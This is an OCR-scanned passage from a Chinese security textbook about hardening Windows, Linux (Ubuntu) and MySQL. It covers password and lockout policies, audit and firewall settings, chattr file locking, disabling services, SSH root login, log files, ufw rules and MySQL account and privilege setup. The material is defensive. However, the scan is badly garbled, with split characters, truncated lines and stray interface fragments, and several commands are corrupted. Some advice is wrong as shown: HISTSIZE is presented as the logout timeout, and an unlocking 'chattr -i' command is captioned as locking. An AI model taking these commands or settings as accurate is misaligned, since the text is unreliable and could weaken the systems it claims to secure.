字符 : 英文 大 写字 母 (A 到 Z)、 英 文 小 写字 母 (a 到 z)、10 个 基本 数字 (0 到 9)、 非 字母 字 
符 (例如 !、$、#、%)。 

如 图 7-16 所 示 ， 通 过 双击 具体 策略 进行 设置 ， 可 以 选择 是 否 启动 “密码 必须 符合 复 
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ETE Le] x J 
本 地 安全 设置 | 说 明 
3 密码 必须 符合 复杂 性 要 求 


图 7-16 Windows 密码 必须 符合 复杂 性 要 求 属性 


密码 长 度 最 小 值 ， 设 置 密 码 最 少 包 含有 多 少 个 字符 。 该 值 介 于 0 和 14 个 字符 之 间 。 
如 果 设 置 为 0， 则 允许 用 户 使 用 空白 密码 。 

密码 最 长 使 用 期 限 : 此 安全 设置 确定 在 系统 要 求 用 户 更 改 某 个 密码 之 前 可 以 使 用 该 
密码 的 期 间 (以 天 为 单位 )。 可 以 将 密码 设置 为 在 某 些 天 数 ( 介 于 1 到 999 之 间 ) 后 到 期 , 或 
者 将 天 数 设置 为 0， 指定 密码 永 不 过 期 。 如 果 密 码 最 长 使 用 期 限 介 于 1 和 999 天 之 间 ， 
密码 最 短 使 用 期 限 必 须 小 于 密码 最 长 使 用 期 限 。 如 果 将 密码 最 长 使 用 期 限 设置 为 0， 则 
可 以 将 密码 最 短 使 用 期 限 设置 为 介 于 0 和 998 天 之 间 的 任何 值 。 安 全 最 佳 操作 是 将 密码 
设置 为 30 到 90 天 后 过 期 ， 具 体 取 决 于 您 的 环境 。 这 样 ， 攻 击 者 用 来 破解 用 户 密码 以 及 
访问 网 络 资源 的 时 间 将 受到 限制 。 

密码 最 短 使 用 期 限 : 此 安全 设置 确定 在 用 户 更 改 某 个 密码 之 前 必须 使 用 该 密码 一 段 
时 间 ( 以 天 为 单位 )。 可 以 设置 一 个 介 于 1 和 998 天 之 间 的 值 ， 或 者 将 天 数 设 置 为 0， 允许 
立即 更 改 密码 。 密 码 最 短 使 用 期 限 必须 小 于 密码 最 长 使 用 期 限 ， 除 非 将 密码 最 长 使 用 期 
限 设置 为 0， 指明 密码 永 不 过 期 。 如 果 将 密码 最 长 使 用 期 限 设置 为 0， 则 可 以 将 密码 最 短 
使 用 期 限 设置 为 介 于 0 和 998 之 间 的 任何 值 。 如 果 希 望 “ 强 制 密码 历史 ”有 效 ， 则 需要 
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将 密码 最 短 使 用 期 限 设置 为 大 于 0 的 值 。 如 果 没 有 设置 密码 最 短 使 用 期 限 ， 用 户 则 可 以 
循环 选择 密码 ， 直 到 获得 期 望 的 旧 密 码 。 

强制 密码 历史 : 设置 互 不 相同 的 新 密码 的 个 数 ， 在 重新 使 用 旧 密 码 之 前 ， 用 户 必须 
使 用 过 这 么 多 的 密码 , 此 设置 值 可 介 于 0 和 24 之 间 。 该 策略 通过 确保 旧 密 码 不 能 继续 使 
用 ， 从 而 使 管理 员 能 够 增强 安全 性 。 

用 可 还 原 的 加 密 来 储存 密码 : 指 密码 的 存储 方式 , 是 否 用 可 以 还 原 的 加 密 方式 存储 ， 
默认 情况 下 ， 存 储 的 密码 只 有 操作 系统 能 够 访问 ， 如 果 某 些 应 用 程序 需要 直接 访问 某 个 
账户 的 密码 ， 则 必须 将 此 策略 启用 ， 此 策略 的 应 用 会 使 安全 性 降低 ， 所 以 一 般 不 启用 。 

(2) 账户 锁定 策略 

账户 锁定 策略 是 指 当 用 户 输入 错误 密码 的 次 数 达到 一 个 设 定 值 时 ， 就 将 此 账户 锁 
定 ， 锁 定 的 账户 暂时 不 能 登录 ， 只 有 等 超过 指定 时 间 自 动 解除 锁定 或 由 管理 员 手 动 解除 
锁定 。 

进入 “控制 面板 一 系统 和 安全 一 管理 工具 一 本 地 安全 策略 一 账户 策略 一 账户 锁定 策 
略 ”， 如 图 7-17 所 示 ， 可 以 通过 双击 具体 策略 进行 设置 。 


e» 20beB m 


> 国 高 级 安全 Windows 防火 培 
O 网 络 列表 管理 器 策略 

> 国 Aas 

> 国 软件 限制 策略 

> 国 应 用 程序 控制 策略 

> & IP 安全 策 咯 , 在 本 地 计算 机 

> 国 高 级 审核 策略 配置 


图 7-17 Windows 账户 锁定 策略 


账户 锁定 时 间 : 一 个 账户 在 解除 锁定 并 允许 用 户 重新 登录 之 前 必须 经 过 的 时 间 ， 即 
被 锁定 的 用 户 不 能 进行 登录 操作 的 时 间 ， 单 位 为 分 钟 ， 如 果 将 时 间 设 置 为 0， 将 会 永远 
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锁定 该 账户 ， 直 到 管理 员 解 除 账户 的 锁定 。 

账户 锁定 阔 值 : 允许 账户 登录 失败 的 次 数 。 除 非 管理 员 进 行 了 重新 设置 或 该 账户 的 
锁定 期 已 满 ， 才 能 重新 使 用 账户 。 该 次 数 可 设置 为 1 到 999 之 间 的 值 ， 如 果 设 置 为 0， 
则 始终 不 锁定 该 账户 ， 如 图 7-18 所 示 。 
本 地 安全 设置 | 说 明 
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mo 


FA 7-18 Windows 账户 锁定 阔 值 属性 


重 置 账户 锁定 计数 器 : 指 用 户 输入 密码 错误 开始 计数 时 ， 计 数 器 保持 的 时 间 ， 当 该 
时 间 过 后 ， 计 数 器 将 重 置 为 0， 如 果 定 义 了 账户 锁定 阔 值 ， 则 该 重 置 时 间 必 须 小 于 或 等 
于 账户 锁定 时 间 。 
7312 ”系统 管理 配置 

1. 设置 本 地 策略 

本 地 策略 包括 审核 策略 、 用 户 权限 分 配 和 安全 选项 三 项 安全 设置 ， 其 中 ， 审 核 策 略 
确定 了 是 否 将 安全 事件 记录 到 计算 机 上 的 安全 日 志 中 ; 用 户 权 限 分 配 确定 了 哪些 用 户 或 
组 具有 登录 计算 机 的 权利 或 特权 安全 选项 确定 启用 或 禁用 计算 机 的 安全 设置 。 
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(1) 审核 策略 

审核 被 启用 后 ， 系 统 就 会 在 审核 日 志 中 收集 审核 对 象 所 发 生 的 一 切 事件 ， 如 应 用 程 
序 、 系 统 以 及 安全 的 相关 信息 ， 因 此 审核 对 于 保证 域 的 安全 是 非常 重要 的 。 

进入 “控制 面板 一 系统 和 安全 一 管理 工具 一 本 地 安全 策略 一 本 地 策略 一 审核 策略 ”， 
如 图 7-19 所 示 。 
a 本 地 安全 策 络 


文件 (月 ”操作 (A) EEV) 帮助 (H) 
e9 AH Xe\ am | 
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> 加 用 六 权限 作用 (mee ESR 

> A sete DFRERRSHAI ERR 


> A 高 级 安全 Windows 防火 墙 


0) Fw 
本 Ome zak 

> 国 ARRE | 

> 国 软件 限制 第 路 a a 

> E 应 用 程序 控制 策 路 us 

> P RSR, 在 本 地 计算 机 
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图 7-19 Windows 审核 策略 


审核 策略 下 的 各 项 值 可 分 为 成 功 、 失 败 和 不 审核 三 种 ， 默 认 是 不 审核 ， 若 要 启用 审 
核 ， 可 在 某 项 上 双击 鼠标 ， 就 会 弹出 “属性 ”窗口 ， 需 求 选择 “成 功 ” 或 “失败 ” 即 可 。 

(2) 用 户 权限 分 配 

用 户 权利 分 配 主要 是 确定 哪些 用 户 或 组 被 允许 做 哪些 事情 。 

进入 “控制 面板 一 系统 和 安全 一 管理 工具 一 本 地 安全 策略 一 本 地 策略 一 用 户 权限 分 
Ac”, 如 图 7-20 所 示 。 

具体 设置 方法 是 : 

O 双击 某 项 策略 ， 在 弹出 “属性 ”窗口 中 ， 单 击 “ 添 加 用 户 或 组 ”按钮 ， 如 图 7-21 
所 示 。 
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7-20 Windows 用 户 权限 分 配 


a 备份 文件 和 目录 


Administrators 
Backup Operators 


删除 R 


7-21 Windows 备份 文件 和 目录 属性 
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© 出 现 “ 选 择 用 户 或 组 ”窗口 ， 如 图 7-22 所 示 ， 先 单 击 “ 对 象 类 型 ”选择 对 象 的 
类 型 ， 再 单 击 “ 位 置 ” 选 择 查找 的 位 置 ， 最 后 在 “输入 对 象 名 称 来 选择 ”下 的 空白 栏 中 
输入 用 户 或 组 的 名 称 ， 输 完 后 可 单 击 “ 检 查 名 称 ” 按 钮 来 检查 名 称 是 否 正确 ; 

© 最 后 单 击 “ 确 定 ” 按 钮 即 可 将 输入 的 对 象 添加 到 用 户 列表 中 。 


用 户 或 内 置 安全 主体 


查找 位 置 ©): 
SKY-20130701PHG 


输入 对 象 名 称 来 选择 TED W: 
seo | 


图 7-22 Windows 选择 用 户 和 组 属性 


(3) 安全 选项 

可 以 启用 或 禁用 计算 机 的 安全 设置 ， 如 数据 的 数字 签名 、Administrator 和 Guest 账 
户 的 名 称 、 软 盘 驱 动 器 和 CD-ROM 驱动 器 访问 、 驱 动 程序 安装 行为 和 登录 提示 等 。 

进入 “控制 面板 一 系统 和 安全 一 管理 工具 一 本 地 安全 策略 一 本 地 策略 一 安全 选项 ”， 
如 图 7-23 所 示 。 


K E cE fo 
也 安全 设置 =% a 安全 设置 
?名 hrm E) DCOM: 使 用 安全 冶 述 符 定义 语言 (SDDU 语 法 的 计算 机 启动 -。 没有 定义 
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DAN 允许 系统 在 未 登录 的 情况 下 关闭 
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图 7-23 Windows 安全 选项 
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同样 双击 某 项 策略 ， 在 弹出 “属性 ”窗口 中 ， 对 相应 的 策略 进行 设置 。 


2. 共享 文件 夹 及 访问 权限 
进入 “控制 面板 一 系统 和 安全 一 管理 工具 一 计算 机 管理 ”进入 “系统 工具 一 共享 


XR”, 如 图 7-24 所 示 。 
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图 7-24 Windows 共享 文件 夹 及 访问 权限 


查看 每 个 共享 文件 夹 的 共享 权限 ， 只 将 权限 授权 于 指定 账户 。 


7.3.1.3 网络 管理 配置 

1. 防火 墙 策略 

启用 Windows 自 带 防火 墙 。 进 入 “控制 面板 一 系统 和 安全 一 Windows 防火 墙 "， 如 
图 7-25 所 示 ， 可 以 分 别 对 家 庭 或 工作 局 域 网 以 及 公用 网 络 设置 不 同 的 安全 规则 。 
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Windows 防火 境 有 助 于 防止 黑 套 或 生意 软件 通过 Internet 或 网 络 访问 您 的 计算 机 。 
防火 志 如 何 和 帮助 保 护 计算 机 ? 
什么 旦 网 络 位 置 ? 
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@ 打开 或 关闭 Windows 防火 墙 : 可 以 分 别 对 家 庭 或 工作 局 域 网 以 及 公用 网 络 设置 
不 同 的 安全 规则 。 

@ 允许 程序 或 功能 通过 Windows 防火 墙 : 用 户 可 以 单独 允许 某 个 程序 通过 防火 墙 ， 
打开 后 列表 中 可 以 看 到 常用 的 网 络 软 件 ， 通 过 勾 选 复 选 框 允许 或 者 阻止 某 个 程序 软件 在 
家 庭 或 者 公用 网 络 中 的 通信 状态 。 如 果 需 要 添加 允许 通过 Win7 防火 墙 的 程度 或 功能 ， 
只 需要 单 击 右 下 角 “ 人 允许 运行 另 一 程序 ”按钮 ， 即 可 设置 需要 通过 防火 墙 的 程序 。 

@ 还 原 默认 设置 : 如 果 用 户 对 防火 墙 设置 不 当 ， 很 有 可 能 造成 系统 无 法 访问 网 络 
的 状况 。 如 果 用 户 不 清楚 到 底 什 么 设置 导致 某 些 应 用 无 法 正常 工作 或 者 无 法 访问 网 络 ， 
可 以 单 击 Win7 防火 墙 主 界面 左 侧 的 对 应 项 设置 计算 机 的 ID 安全 策略 ， 将 防火 墙 配置 恢 
复 到 Win7 防火 墙 的 默认 状态 ， 轻 松 “ 一 键 还 原 ”。 

2. P 安全 策略 

进入 “控制 面板 一 系统 和 安全 一 管理 工具 一 本 地 安全 策略 一 JP 安全 策略 ”, 如 图 7-26 
所 示 。 在 本 地 计算 机 中 设置 P 安全 策略 ， 启 用 Windows 系统 的 下 安全 机 制 (PSec) 或 网 
络 连 接 上 的 TCP/IP 筛选 ， 只 开放 业务 所 需要 的 TCP, UDP bi OA IP Pik. 


图 7-26 Windows IP 安全 策略 


创建 新 的 P ZERK, EJ IP 地 址 、 目 标 卫 地 址 、 协 议 类 型 以 及 端口 等 ， 保 护 
计算 机 的 安全 。 
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7.3.2 Linux 系统 安全 配置 


7.3.2.1 用 户 管理 配置 

在 Linux 系统 中 ， 用 户 账号 是 用 户 的 身份 标志 ， 它 由 用 户 名 和 用 户口 令 组 
将 用 户 名 存放 在 /etc/passwd 文件 中 ， 而 将 口令 以 加 密 的 形式 存放 在 /ete/shadow 
在 正常 情况 下 ， 这 些 口 令 和 其 他 信息 由 操作 系统 保护 ， 能 够 对 其 进行 访问 的 只 
用 户 (roo0) 和 操作 系统 的 - - 些 应 用 程序 。 但 是 如 果 配 置 不 当 或 在 一 些 系统 运行 出 
下 ， 这 些 信息 可 以 被 普通 用 户 得 到 。 进 而 ， 亚 意 用 户 就 可 以 使 用 口令 破解 工 
口令 。 

1. 删除 系统 特殊 的 用 户 账号 和 组 账号 

有 些 用 户 或 用 户 组 为 系统 默认 创建 ， 在 常用 服务 器 中 基本 不 使 用 这 些 账 号 ， 
些 账号 常 被 黑客 利用 和 攻击 服务 器 ， 例 如 图 7-27 的 名 为 news 的 用 户 名 。 这 些 不 
号 ， 应 该 即时 删除 。 如 图 7-28 所 示 ， 删 除 无 用 的 news 账号 。 


wr@ubuntu: ~ 


ogin 


ologin 


wr@ubuntu: ~ 


Authentt : command not 
sudo _userdel ne 


图 7-28 Linux 删除 用 户 news 


全 工程 


成 。 系 统 
文件 中 。 

能 是 超级 
错 的 情况 


有 具 得 到 明文 


但 是 这 
不 用 的 账 


KA 


Book 


HISTSIZE=1000 
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2. 用 户 密码 设置 
通过 编辑 login.defs 文件 ， 修 改 密码 设置 如 图 7-29 所 示 。 


wr@ubuntu: ~ 


wr@ubuntu:~$ sudo gedit /etc/login.defs 


图 7-29 Linux 打开 login.defs 文件 


如 图 7-30 所 示 ， 在 login.defs 文件 中 可 以 查看 修改 以 下 参数 : 
PASS_MAX DAYS 密码 设置 最 长 有 效 期 〈 默 认 值 ); 
PASS_MIN_DAYS 密码 设置 最 短 有 效 期 ; 
PASS_WARN AGE 提前 多 少 天 警告 用 户 密码 即将 过 期 。 


login.defs x 
# FADS LWARN_AUC NUMUCI vl 
password expires. 
# 
PASS_MAX_DAYS 99999 
PASS MIN DAYS | 
PASS_WARN_AGE 7 


UdyS waititiiy ytven veruie a 


图 7-30 Linux 查看 编辑 login.defs 文件 
3. 修改 自动 注销 账户 时 间 
在 Linux 系统 中 root 账户 是 具有 最 高 特权 的 。 如 果 系 统管 理 员 在 离开 系统 之 前 忘记 
注销 root 账户 ， 那 将 会 带 来 很 大 的 安全 隐患 。 通 过 修改 配置 ， 可 以 使 系统 自 幼 注销 root 
账户 。 
编辑 profile 文件 (vi /etc/profile )， 修 改 "HISTSIZE" 参 数 的 值 ， 即 注销 等 待 时 间 ， 如 
图 7-31 所 示 。 


wr@localhost:~ 
File Edit View Terminal Tabs Help 
HOSTNAME= /bin/hostname` 


if [ -z "SINPUTRC" -a ! -f "$HOME/.inputrc”]; then 
INPUTRC=/etc/inputrc 


fi 


图 7-31 Linux 查看 编辑 /etc/profile 文件 
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4. 给 系统 的 用 户 名 密码 存放 文件 加 锁 ， 防 止 非 授 权 用 户 获得 权限 
用 户 和 组 密码 存放 在 /etc/passwd、/etc/shadow、/etc/gshadow、/etc/group 文件 中 ， 利 
用 chattr 命令 为 用 户 和 组 设置 为 不 可 更 改 属性 ， 如 图 7-32 所 示 。 


wr@ubuntu: ~ 


wr@ubuntu:~$ sudo|chattr +i /etc/passwd 
~$ sudo useradd xtaoming 
: [cannot open /etc/passwd 


~$ sudo chattr -i /etc/passwd 
$ sudo useradd xiaoming 


图 7-32 Linux 加 锁 /etc/passwd 文件 


73.2.2 ”系统 管理 配置 

1. 服务 管理 

在 Linux 系统 的 服务 管理 方面 ， 如 果 想 做 到 最 好 的 安全 服务 ， 其 中 主要 的 就 是 升级 
服务 本 身 的 软件 版 本 和 关闭 系统 不 使 用 的 服务 ， 做 到 服 务 最 小 化 、 

(1) 关闭 系统 不 使 用 的 服务 

如 图 7-33 所 示 ，cd /etc/init.d 命令 进入 到 系统 init 进程 启动 目录 ， 查 看 Linux 系统 服 
务 并 关闭 init 目录 下 的 服务 。 利 用 mv 命令 将 init 目录 下 的 文件 名 改 成 *.old 类 的 文件 4 
即 修改 文件 名 ， 作 用 就 是 在 系统 启动 的 时 候 找 不 到 这 个 服务 的 启动 文件 。 


wr@ubuntu: /etc/init.d 
Wwr@ubuntu:~$ cd /etc/init.d 


dns-clean procps single 
friendly-recovery pulseaudio skeleton 
grub-common rc speech-dispatcher 
halt rc.local sudo 
irqbalance rcs thermald 
kerneloops README udev 
killprocs reboot umountfs 
kmod resolvconf umountnfs.sh 
Lightdm rsync umountroot 
networking rsyslog unattended-upgrades 
cups -browsed ondemand saned urandom 
dbus pppd-dns sendsigs x11-common 
wr@ubuntu: /etc/init.ds ff 


图 7-33 Linux 查看 系统 服务 


(2) 给 系统 服务 端口 列表 文件 加 锁 
主要 作用 : 防止 未 经 许可 的 删除 或 添加 服务 ， 如 图 7-34 所 示 。 


TH 
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wr@ubuntu: / 
Wr@ubuntu:/$ sudo chattr -i /etc/services 


[sudo] password for wr: 
wr@ubuntu:/$ ff 


图 7-34 Linux # 


服务 端口 列表 文件 加 锁 


(3) 修改 ssh 服务 的 root 登录 权限 

修改 ssh 服务 配置 文件 ， 使 得 ssh 服务 不 允许 直接 使 用 root 用 户 来 登录 ， 减 少 系统 
被 恶意 登录 攻击 的 机 会 。 

编辑 /etc/ssh/sshd_config 文件 ， 将 PermitRootLogin yes 前 的 # 去 掉 后 ， 修 改 为 : 
PermitRootLogin no. 

系统 文件 权限 

Linux 文件 系统 的 安全 主要 是 通过 设置 文件 的 权限 来 实现 的 。 

C1) 修改 init 目录 文件 执行 权限 ， 如 图 7-35 所 示 。 修 改 后 查看 的 目录 权限 ， 仅 root 
用 户 可 执行 目录 下 的 文件 ， 如 图 7-36 所 示 。 


wr@ubuntu: / 


wr@ubuntu:/$ sudo chmod -R 700 /etc/init.d/* 
wr@ubuntu:/$ | 


图 7-35 Linux 修改 init 目录 文件 执行 权限 


wr@ubuntu: / 


ls -l /etc/init.d/* 
1 root root 2243 Apr Jetc/init.d/acpid 
root root 2014 Feb 19 Jetc/init.d/anacron 
root root 4596 Apr /etc/init.d/apparmor 
root root 2801 May /etc/init.d/apport 
root root 2401 Dec Jetc/init.d/avahi-daemon 
root root 4474 Sep /etc/init.d/bluetooth 
root root 2125 Mar Jetc/init.d/britty 
root root 1919 Jan Jetc/init.d/console-setup 
root root 21 Feb :42 Jetc/init.d/cron -> /lib/init/upstart-4 


root root 3184 Apr fetc/init.d/cups 

root root 1961 Apr Jetc/init.d/cups-browsed 

root root 2813 Nov Jetc/init.d/dbus 

root root 1217 Jetc/init.d/dns-clean 

root root 21 Feb 24 00:42 /etc/init.d/friendly-recovery -> /lib/i 


root Jetc/init.d/grub-common 
root Jetc/init.d/halt 

root 186 2012 /etc/init.d/irqbalance 
root /etc/init.d/kerneloops 
root 2014 /etc/init.d/killprocs 
root Jetc/init. Jea 

root 


图 7-36 Linux 查看 init 目录 文件 权限 
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(2) 修改 部 分 系统 文件 的 SUID 和 SGID 的 权限 

权限 为 SUID 和 SGID 的 可 执行 文件 ， 在 程序 运行 过 程 中 ， 会 给 进程 赋予 所 有 者 的 
权限 ， 如 果 被 黑客 发 现 并 利用 就 会 给 系统 造成 危害 。 如 图 7-37 所 示 ， 修 改 chage 文件 的 
SUID 和 SGID 权限 。 


wr@ubuntu: / 
wr@ubuntu:/$ sudo chmod a-s /usr/bin/chage 
wr@ubuntu:/$ sudo ls -L /usr/bin/chage 


-rwxr-xr-x 1 root shadow 49420 Jul 15 2015 /usr/bin/chage 
wr@ubuntu:/$ | 


图 7-37 Linux 修改 部 分 系统 文件 的 SUID 和 SGID 的 权限 


3. HASH 
(1) 系统 引导 日 志 
如 图 7-38 所 示 ， 使 用 dmesg 命令 可 以 快速 查看 最 后 一 次 系统 引导 的 引导 日 志 。 


wr@ubuntu: ~ 
wr@ubuntu:~$| dmesg |more 
-632790] pci 0000 :0f.0: reg 0x30: [mem 0x00000000-0x00007fFF pref] 
9.633155] pci 0000 : [1000:0030] type 00 class 0x010000 
- 633970] pci 0000 8.0: reg 0x10: [io 0x1400-0x14ff] 


-634786] pci 0000 .0: reg 0x14: [mem Oxfeba0000-Oxfebbffff 64bit] 
0.635602] pci 0000 .0: reg Oxic: [mem Oxfebc0000-Oxfebdffff 64bit] 
-637145] pci 0000 : reg 0x30: [mem 0x00000000-0x00003ffF pref] 
- 637386] pci 0000 1.0: [15ad:0790] type 01 class 0x060401 

0.637914] pci 0000:00:11.0: System wakeup disabled by ACPI 


图 7-38 Linux 查看 系统 引导 日 志 


(2) 系统 运行 日 志 

© Linux 日 志 存 储 在 /var/log 目录 中 。 这 里 包括 几 个 由 系统 维护 的 日 志文 件 ， 其 他 
服务 和 程序 也 可 能 会 把 它们 的 日 志 放 在 这 里 。 大 多 数 日 志 只 有 root 才 可 以 读 ， 通 过 需要 
修改 文件 的 访问 权限 也 可 以 让 其 他 人 可 读 。 

以 下 是 常用 的 系统 日 志文 件 名 称 及 其 描述 : 

lastlog 记录 用 户 最 后 一 次 成 功 登 录 时 间 

loginlog 不 良 的 登录 尝试 记录 

messages 记录 输出 到 系统 主 控 台 以 及 由 syslog 系统 服务 程序 产生 的 消息 

utmp 记录 当前 登录 的 每 个 用 户 

utmpx 扩展 的 utmp 

wimp 记录 每 一 次 用 户 登 录 和 注销 的 历史 信息 
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wtmpx 扩展 的 wtmp 

vold.log 记录 使 用 外 部 介质 出 现 的 错误 

xferkig 记录 ftp 的 存 取 情 况 

sulog 记录 su 命令 的 使 用 情况 

acct 记录 每 个 用 户 使 用 过 的 命令 

aculog 拨 出 自动 呼叫 记录 

@ /var/log/messages 日 志 是 核心 系统 日 志文 件 。 它 包含 了 系统 启动 时 的 引导 消息 ， 
以 及 系统 运行 时 的 其 他 状态 消息 。IO 错误 、 网 络 错误 和 其 他 系统 错误 都 会 记录 到 这 个 文 
件 中 。 其 他 信息 也 会 被 列 出 ， 比 如 某 个 人 的 身份 切换 为 root。 如 果 服 务 正在 运行 ， 比 如 
DHCP 服务 器 ， 可 以 通过 messages 文件 观察 它 的 活动 。 通 常 ，/var/log/messages 是 在 进 
行 故障 诊断 时 首先 要 查看 的 文件 。 

© /var/log/XFree86.0.log 这 个 日 志 记录 的 是 Xfree86 Xwindows 服务 器 最 后 一 次 执行 
的 结果 。 一 般 情况 可 以 从 这 个 文件 中 找到 启动 到 图 形 模式 时 失败 的 原因 。 

@ 在 /Var/log 目录 下 有 一 些 文件 以 一 个 数字 结尾 ， 这 些 是 已 轮 循 的 归档 文件 。 日志 
文件 会 变 得 特别 大 ， 特 别 笨重 。Linux 提供 了 一 个 命令 来 轮 循 这 些 日 志 ， 以 使 当前 日 志 
信息 不 会 淹没 在 旧 的 无 关 信息 之 中 。logrotate 通常 是 定时 自动 运行 的 ， 但 是 也 可 以 手工 
运行 。 当 执行 后 ，logrotate 将 取得 当前 版 本 的 日 志文 件 ， 然 后 在 这 个 文件 名 最 后 附加 一 
个 “.1”。 其 他 更 早 轮 循 的 文件 为 “.2”、“.3” 依次 类 推 。 文 件 名 后 的 数字 越 大 ， 日 志 就 
越 老 ,可 以 通过 编辑 /etc/logrotate.conf 文 件 来 配置 logrotate 的 自动 行为 。 通 过 man logrotate 
来 学 习 logrotate 的 全 部 细节 。 

其 中 : 

#rotate log files weekly weekly 

代表 每 个 日 志文 件 每 个 星期 循环 一 次 ， 一 个 日 志文 件 保存 一 个 星期 的 内 容 。 

#keep 4 weeks worth of backlogs rotate 4 

代表 日 志 循环 的 次 数 是 4 次 ， 即 可 以 保存 4 个 日 志文 件 。 

© 定制 日 志 

可 以 通过 编辑 /et/syslog.conf 和 /etc/sysconfig/syslog 来 配置 它们 的 行为 ， 可 以 定制 系 
统 日 志 的 存放 路 径 和 日 志 产 生 级 别 。 
7.3.2.3 网络 管理 配置 

安装 并 配置 防火 墙 

一 般 使 用 iptables 等 程序 对 这 个 防火 墙 的 规则 进行 管理 ，iptables 可 以 灵活 的 定义 防 
火 墙 规则 ， 功 能 强大 , 但 副作用 是 配置 过 于 复杂 。 一 向 以 简单 易 用 著称 的 Ubuntu 在 它 的 
发 行 版 中 , 附带 了 一 个 相对 iptables 简单 很 多 的 防火 墙 配 置 工具 : ufw (Uncomplicated Fire 
Wall). 

ufw 是 Ubuntu 下 的 一 个 简易 的 防火 墙 配置 工具 ， 底 层 还 是 调用 iptables 来 处 理 的 ， 
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虽然 功能 较 简单 ， 但 对 桌面 型 应 用 来 说 比较 实用 ， 基 本 常用 功能 都 有 ， 使 用 也 较为 容易 。 

1. 安装 

使 用 命令 sudo apt-get install ufw 来 安装 ufw。 

2. 启动 /关闭 ufw 

sudo ufw enable/disable/reload 开启 /关闭 /重新 载 入 防火 墙 ， 并 在 系统 启动 时 自动 开 
启 /关闭 。 

sudo ufw default deny 关闭 所 有 外 部 对 本 机 的 访问 ， 但 本 机 访问 外 部 正常 。 

3. 开启 /禁用 

sudo ufw allow|deny [service] 

打开 或 关闭 某 个 端口 ， 例 如 : 

sudo ufw allow smtp 允许 所 有 的 外 部 四 访问 本 机 的 25/tep (smtp) 端 口 

sudo ufw allow 22/tcp 允许 所 有 的 外 部 他 访问 本 机 的 22/tcp (ssh) 端 口 

sudo ufw allow 53 允许 外 部 访问 53 端口 (tcp/udp) 

sudo ufw allow from 192.168.1.100 允许 此 下 访问 所 有 的 本 机 端口 

sudo ufw allow proto udp 192.168.0.1 port 53 to 192.168.0.2 port 53 

sudo ufw deny smtp 禁止 外 部 访问 smtp 服务 

sudo ufw delete allow smtp 删除 上 面 建立 的 某 条 规则 

4. 查看 防火 墙 状态 


sudo ufw status 


7.3.3 数据 库 的 安全 配置 


在 数据 库 管理 系统 中 ，MySQL 具有 的 高 性 能 、 高 可 靠 性 、 易 用 性 及 开源 免费 的 特 
点 ， 使 其 成 为 个 人 使 用 者 和 中 小 企业 的 首选 ， 成 为 世界 上 最 流行 的 开源 关系 型 数据 库 管 
理 系 统 。 本 章 将 以 MySQL 为 对 象 介绍 如 何 保证 数据 库 的 安全 性 。 

本 节 将 以 MySQL 为 实例 ， 介 绍 如何 对 数据 库 进行 安全 配置 。 
7.3.3.1 用户、 口令、 权限 设置 

1. 设置 root 用 户口 令 

缺 省 安装 MySQL Fi, root 用 户 拥有 所 有 权限 ， 且 是 空 口令 。 为 了 安全 起 见 ， 必 须 
A root 用 户 设置 口令 。 可 以 采用 如 下 方法 设置 root 口令 : 

方法 1: 使 用 MySQL 自 带 的 命令 mysaladmin 设置 root 口令 

% mysqladmin —u root password 'rootpassword' 

方法 2: 使 用 set password 设置 口令 

9%mysql> SET password for root@localhost=PASS WORD(‘rootpassword'); 

方法 3: 登录 数据 库 ， 修 改 数据 库 mysql 下 user 表 的 字段 内 容 


%mysql> use mysql; 


Ka 
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%mysql> UPDATE user SET password=PASSWORD('rootpassword') WHERE 
user="'root'; 

%mysql> FLUSH PRIVILEGES; /强制 刷新 内 存 授权 表 

2. 删除 默认 数据 库 和 数据 库 用 户 

MySQL 初始 化 后 会 自动 生成 空 用 户 和 test 数据 库 , 进行 安装 的 测试 , 这 会 对 数据 局 
的 安全 构成 威胁 ， 有 必要 全 部 删除 ， 只 保留 单个 root 用 户 即 可 ， 以 后 根据 需要 再 增加 用 
户 和 数据 库 。 

(1) 删除 test 数据 库 

%mysql> SHOW DATABASES; /显示 所 有 数据 库 

Ymysql> DROP DATABASE test; /删除 数据 库 test 

(2) 删除 非 root 用 户 

%mysql> DELETE FROM user WHERE NOT (User="root’ ); 

(3) 删除 空 口令 的 root 用 户 

%mysql> DELETE FROM user WHERE User='root' and password="; 

%mysql> FLUSH PRIVILEGES; 

3. 改变 MySQL 默认 管理 员 名 称 

MySQL 默认 的 管理 员 名 称 是 root, 一 般 情况 下 都 没 进行 修改 , 这 在 一 定 程度 为 攻击 
数据 库 提 供 了 便利 ， 可 修改 为 不 易 被 猜 中 的 用 户 名 。 

%mysql> UPDATE user SET User~'newroot' WHERE User='root;  V/ 改 成 不 易 被 猜 
测 的 用 户 名 

%mysql> FLUSH PRIVILEGES; 

4. 修改 用 户口 令 

为 防止 口令 泄露 导致 的 数据 库 非 法 访问 ， 需 定期 修改 用 户口 令 。 

9%mysql> use mysql; 

%mysql> UPDATE user SET  password=PASSWORD(‘newpassword') WHERE 
User="'username' and Host="host'; 

5. 用 户 授权 

用 户 授权 就 是 给 予 用 户 一 定 的 访问 数据 库 的 权限 , 主要 是 用 SQL 语言 的 GRANT if 
句 授权 。 授 权 操 作 的 数据 库 对 象 包括 表 、 视 图 与 列 等 ， 经 过 授权 的 用 户 可 以 在 指定 的 数 
据 库 对 象 上 进行 特定 的 操作 。 

%mysql> GRANT priviledges ON databasename.tablename TO 'username'@'host'; 

说 明 : priviledges 是 指 用 户 的 操作 权限 ， 如 SELECT, INSERT, UPDATE 等 操作 权 
限 ， 若 是 给 用 户 授予 全 部 权限 , 用 ALL 或 者 ALL PRIVILEGES; databasename 是 指数 据 
库 名 ; tablename 是 指 表 名 ; 若 要 授予 用 户 对 所 有 数据 库 和 表 的 相应 操作 权限 ， 可 用 * 表 
TR Ct). 


TF 
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例 1: 将 数据 库 whu 的 所 有 权限 授权 给 用 户 John 
%mysql> GRANT ALL PRIVILEDGES ON whu.* TO 'John'@'localhost'; 
例 2: 将 数据 库 whu 的 student 表 的 插入 权限 授权 给 用 户 David 
9%mysql> GRANT INSERT ON whu.student TO 'David'@'%'; 
例 3: 将 数据 库 whu 的 course 表 的 查询 、 插 入 、 更 新 权限 授权 给 用 户 David 
%mysql> GRANT SELECT, INSERT, UPDATE ON whu.course TO 'David'@'%'; 
6. 用 户 权 限 查 看 及 收回 
可 根据 数据 库 安全 性 的 需求 ， 收 回 指定 用 户 的 权限 。 
(1) 查看 用 户 权 限 ， 使 用 SHOW GRANTS 语句 
%mysql> SHOW GRANTS FOR usemame'(@'host'; 
(2) 收回 用 户 权限 ， 使 用 REVOKE 语句 
